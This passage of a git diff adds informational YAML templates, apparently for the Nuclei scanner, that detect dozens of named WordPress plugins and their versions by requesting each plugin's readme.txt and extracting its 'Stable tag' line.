iThemes Security Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/better-wp-security/ + metadata: + plugin_namespace: better-wp-security + wpscan: https://wpscan.com/plugin/better-wp-security + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml new file mode 100644 index 0000000000..afaac29a6a --- /dev/null +++ b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml @@ -0,0 +1,35 @@ + +id: wordpress-black-studio-tinymce-widget + +info: + name: Black Studio TinyMCE Widget Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/black-studio-tinymce-widget/ + metadata: + plugin_namespace: black-studio-tinymce-widget + wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml new file mode 100644 index 0000000000..d62227eff2 --- /dev/null +++ b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml @@ -0,0 +1,35 @@ + +id: wordpress-breadcrumb-navxt + +info: + name: Breadcrumb NavXT Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/breadcrumb-navxt/ + metadata: + plugin_namespace: breadcrumb-navxt + wpscan: https://wpscan.com/plugin/breadcrumb-navxt + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-broken-link-checker.yaml b/technologies/wordpress/wordpress-broken-link-checker.yaml new file mode 100644 index 0000000000..7aa89ccb8d --- /dev/null +++ b/technologies/wordpress/wordpress-broken-link-checker.yaml @@ -0,0 +1,35 @@ + +id: wordpress-broken-link-checker + +info: + name: Broken Link Checker Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/broken-link-checker/ + metadata: + plugin_namespace: broken-link-checker + wpscan: https://wpscan.com/plugin/broken-link-checker + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-child-theme-configurator.yaml b/technologies/wordpress/wordpress-child-theme-configurator.yaml new file mode 100644 index 0000000000..0fdd5f8e24 --- /dev/null +++ b/technologies/wordpress/wordpress-child-theme-configurator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-child-theme-configurator + +info: + name: Child Theme Configurator Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/child-theme-configurator/ + metadata: + plugin_namespace: child-theme-configurator + wpscan: https://wpscan.com/plugin/child-theme-configurator + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-classic-editor.yaml b/technologies/wordpress/wordpress-classic-editor.yaml new file mode 100644 index 0000000000..c336cfd406 --- /dev/null +++ b/technologies/wordpress/wordpress-classic-editor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-classic-editor + +info: + name: Classic Editor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/classic-editor/ + metadata: + plugin_namespace: classic-editor + wpscan: https://wpscan.com/plugin/classic-editor + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-classic-widgets.yaml b/technologies/wordpress/wordpress-classic-widgets.yaml new file mode 100644 index 0000000000..49cb1f965b --- /dev/null +++ b/technologies/wordpress/wordpress-classic-widgets.yaml @@ -0,0 +1,35 @@ + +id: wordpress-classic-widgets + +info: + name: Classic Widgets Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/classic-widgets/ + metadata: + plugin_namespace: classic-widgets + wpscan: https://wpscan.com/plugin/classic-widgets + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml new file mode 100644 index 0000000000..42ba23f4a3 --- /dev/null +++ b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-click-to-chat-for-whatsapp + +info: + name: Click to Chat Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ + metadata: + plugin_namespace: click-to-chat-for-whatsapp + wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cloudflare.yaml b/technologies/wordpress/wordpress-cloudflare.yaml new file mode 100644 index 0000000000..9c3a49f45f --- /dev/null +++ b/technologies/wordpress/wordpress-cloudflare.yaml @@ -0,0 +1,35 @@ + +id: wordpress-cloudflare + +info: + name: Cloudflare Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/cloudflare/ + metadata: + plugin_namespace: cloudflare + wpscan: https://wpscan.com/plugin/cloudflare + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cmb2.yaml b/technologies/wordpress/wordpress-cmb2.yaml new file mode 100644 index 0000000000..496903cdfe --- /dev/null +++ b/technologies/wordpress/wordpress-cmb2.yaml @@ -0,0 +1,35 @@ + +id: wordpress-cmb2 + +info: + name: CMB2 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/cmb2/ + metadata: + plugin_namespace: cmb2 + wpscan: https://wpscan.com/plugin/cmb2 + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-coblocks.yaml b/technologies/wordpress/wordpress-coblocks.yaml new file mode 100644 index 0000000000..1ec83936b0 --- /dev/null +++ b/technologies/wordpress/wordpress-coblocks.yaml @@ -0,0 +1,35 @@ + +id: wordpress-coblocks + +info: + name: Page Builder Gutenberg Blocks – CoBlocks Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/coblocks/ + metadata: + plugin_namespace: coblocks + wpscan: https://wpscan.com/plugin/coblocks + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-code-snippets.yaml b/technologies/wordpress/wordpress-code-snippets.yaml new file mode 100644 index 0000000000..689ae14ae1 --- /dev/null +++ b/technologies/wordpress/wordpress-code-snippets.yaml @@ -0,0 +1,35 @@ + +id: wordpress-code-snippets + +info: + name: Code Snippets Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/code-snippets/ + metadata: + plugin_namespace: code-snippets + wpscan: https://wpscan.com/plugin/code-snippets + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-coming-soon.yaml b/technologies/wordpress/wordpress-coming-soon.yaml new file mode 100644 index 0000000000..b3ee0df382 --- /dev/null +++ b/technologies/wordpress/wordpress-coming-soon.yaml @@ -0,0 +1,35 @@ + +id: wordpress-coming-soon + +info: + name: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/coming-soon/ + metadata: + plugin_namespace: coming-soon + wpscan: https://wpscan.com/plugin/coming-soon + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-complianz-gdpr.yaml b/technologies/wordpress/wordpress-complianz-gdpr.yaml new file mode 100644 index 0000000000..e1c54c59f5 --- /dev/null +++ b/technologies/wordpress/wordpress-complianz-gdpr.yaml @@ -0,0 +1,35 @@ + +id: wordpress-complianz-gdpr + +info: + name: Complianz – GDPR/CCPA Cookie Consent Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/complianz-gdpr/ + metadata: + plugin_namespace: complianz-gdpr + wpscan: https://wpscan.com/plugin/complianz-gdpr + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml new file mode 100644 index 0000000000..f69534992d --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml @@ -0,0 +1,35 @@ + +id: wordpress-contact-form-7-honeypot + +info: + name: Honeypot for Contact Form 7 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/contact-form-7-honeypot/ + metadata: + plugin_namespace: contact-form-7-honeypot + wpscan: https://wpscan.com/plugin/contact-form-7-honeypot + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-7.yaml b/technologies/wordpress/wordpress-contact-form-7.yaml new file mode 100644 index 0000000000..4691b6ded0 --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-7.yaml @@ -0,0 +1,35 @@ + +id: wordpress-contact-form-7 + +info: + name: Contact Form 7 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/contact-form-7/ + metadata: + plugin_namespace: contact-form-7 + wpscan: https://wpscan.com/plugin/contact-form-7 + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml new file mode 100644 index 0000000000..0909866f0b --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml @@ -0,0 +1,35 @@ + +id: wordpress-contact-form-cfdb7 + +info: + name: Contact Form 7 Database Addon – CFDB7 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/contact-form-cfdb7/ + metadata: + plugin_namespace: contact-form-cfdb7 + wpscan: https://wpscan.com/plugin/contact-form-cfdb7 + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cookie-law-info.yaml b/technologies/wordpress/wordpress-cookie-law-info.yaml new file mode 100644 index 0000000000..a75c91f4ff --- /dev/null +++ b/technologies/wordpress/wordpress-cookie-law-info.yaml @@ -0,0 +1,35 @@ + +id: wordpress-cookie-law-info + +info: + name: CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/cookie-law-info/ + metadata: + plugin_namespace: cookie-law-info + wpscan: https://wpscan.com/plugin/cookie-law-info + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cookie-notice.yaml b/technologies/wordpress/wordpress-cookie-notice.yaml new file mode 100644 index 0000000000..f1fe44e14f --- /dev/null +++ b/technologies/wordpress/wordpress-cookie-notice.yaml @@ -0,0 +1,35 @@ + +id: wordpress-cookie-notice + +info: + name: Cookie Notice & Compliance for GDPR / CCPA Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/cookie-notice/ + metadata: + plugin_namespace: cookie-notice + wpscan: https://wpscan.com/plugin/cookie-notice + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml new file mode 100644 index 0000000000..d68b2b7758 --- /dev/null +++ b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml @@ -0,0 +1,35 @@ + +id: wordpress-creame-whatsapp-me + +info: + name: Joinchat Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/creame-whatsapp-me/ + metadata: + plugin_namespace: creame-whatsapp-me + wpscan: https://wpscan.com/plugin/creame-whatsapp-me + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml new file mode 100644 index 0000000000..6b969a027b --- /dev/null +++ b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml @@ -0,0 +1,35 @@ + +id: wordpress-creative-mail-by-constant-contact + +info: + name: Creative Mail – Easier WordPress & WooCommerce Email Marketing Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/creative-mail-by-constant-contact/ + metadata: + plugin_namespace: creative-mail-by-constant-contact + wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-css-js.yaml b/technologies/wordpress/wordpress-custom-css-js.yaml new file mode 100644 index 0000000000..e8e5780678 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-css-js.yaml @@ -0,0 +1,35 @@ + +id: wordpress-custom-css-js + +info: + name: Simple Custom CSS and JS Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/custom-css-js/ + metadata: + plugin_namespace: custom-css-js + wpscan: https://wpscan.com/plugin/custom-css-js + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-fonts.yaml b/technologies/wordpress/wordpress-custom-fonts.yaml new file mode 100644 index 0000000000..4b27804793 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-fonts.yaml @@ -0,0 +1,35 @@ + +id: wordpress-custom-fonts + +info: + name: Custom Fonts Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/custom-fonts/ + metadata: + plugin_namespace: custom-fonts + wpscan: https://wpscan.com/plugin/custom-fonts + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.yaml b/technologies/wordpress/wordpress-custom-post-type-ui.yaml new file mode 100644 index 0000000000..6740839a05 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-post-type-ui.yaml @@ -0,0 +1,35 @@ + +id: wordpress-custom-post-type-ui + +info: + name: Custom Post Type UI Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/custom-post-type-ui/ + metadata: + plugin_namespace: custom-post-type-ui + wpscan: https://wpscan.com/plugin/custom-post-type-ui + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-disable-comments.yaml b/technologies/wordpress/wordpress-disable-comments.yaml new file mode 100644 index 0000000000..e8546d1d17 --- /dev/null +++ b/technologies/wordpress/wordpress-disable-comments.yaml @@ -0,0 +1,35 @@ + +id: wordpress-disable-comments + +info: + name: Disable Comments – Remove Comments & Stop Spam [Multi-Site Support] Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/disable-comments/ + metadata: + plugin_namespace: disable-comments + wpscan: https://wpscan.com/plugin/disable-comments + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-disable-gutenberg.yaml b/technologies/wordpress/wordpress-disable-gutenberg.yaml new file mode 100644 index 0000000000..a4e6773537 --- /dev/null +++ b/technologies/wordpress/wordpress-disable-gutenberg.yaml @@ -0,0 +1,35 @@ + +id: wordpress-disable-gutenberg + +info: + name: Disable Gutenberg Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/disable-gutenberg/ + metadata: + plugin_namespace: disable-gutenberg + wpscan: https://wpscan.com/plugin/disable-gutenberg + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicate-page.yaml b/technologies/wordpress/wordpress-duplicate-page.yaml new file mode 100644 index 0000000000..cecbe7e62f --- /dev/null +++ b/technologies/wordpress/wordpress-duplicate-page.yaml @@ -0,0 +1,35 @@ + +id: wordpress-duplicate-page + +info: + name: Duplicate Page Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/duplicate-page/ + metadata: + plugin_namespace: duplicate-page + wpscan: https://wpscan.com/plugin/duplicate-page + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicate-post.yaml b/technologies/wordpress/wordpress-duplicate-post.yaml new file mode 100644 index 0000000000..3eb4affafe --- /dev/null +++ b/technologies/wordpress/wordpress-duplicate-post.yaml @@ -0,0 +1,35 @@ + +id: wordpress-duplicate-post + +info: + name: Yoast Duplicate Post Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/duplicate-post/ + metadata: + plugin_namespace: duplicate-post + wpscan: https://wpscan.com/plugin/duplicate-post + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicator.yaml b/technologies/wordpress/wordpress-duplicator.yaml new file mode 100644 index 0000000000..7baec1ca5c --- /dev/null +++ b/technologies/wordpress/wordpress-duplicator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-duplicator + +info: + name: Duplicator – WordPress Migration Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/duplicator/ + metadata: + plugin_namespace: duplicator + wpscan: https://wpscan.com/plugin/duplicator + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml new file mode 100644 index 0000000000..d2e0b0312a --- /dev/null +++ b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml @@ -0,0 +1,35 @@ + +id: wordpress-duracelltomi-google-tag-manager + +info: + name: GTM4WP Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ + metadata: + plugin_namespace: duracelltomi-google-tag-manager + wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-fancybox.yaml b/technologies/wordpress/wordpress-easy-fancybox.yaml new file mode 100644 index 0000000000..78599b120f --- /dev/null +++ b/technologies/wordpress/wordpress-easy-fancybox.yaml @@ -0,0 +1,35 @@ + +id: wordpress-easy-fancybox + +info: + name: Easy FancyBox Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/easy-fancybox/ + metadata: + plugin_namespace: easy-fancybox + wpscan: https://wpscan.com/plugin/easy-fancybox + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-google-fonts.yaml b/technologies/wordpress/wordpress-easy-google-fonts.yaml new file mode 100644 index 0000000000..ceb0af50e5 --- /dev/null +++ b/technologies/wordpress/wordpress-easy-google-fonts.yaml @@ -0,0 +1,35 @@ + +id: wordpress-easy-google-fonts + +info: + name: Easy Google Fonts Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/easy-google-fonts/ + metadata: + plugin_namespace: easy-google-fonts + wpscan: https://wpscan.com/plugin/easy-google-fonts + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.yaml b/technologies/wordpress/wordpress-easy-table-of-contents.yaml new file mode 100644 index 0000000000..56f51a820c --- /dev/null +++ b/technologies/wordpress/wordpress-easy-table-of-contents.yaml @@ -0,0 +1,35 @@ + +id: wordpress-easy-table-of-contents + +info: + name: Easy Table of Contents Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/easy-table-of-contents/ + metadata: + plugin_namespace: easy-table-of-contents + wpscan: https://wpscan.com/plugin/easy-table-of-contents + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git 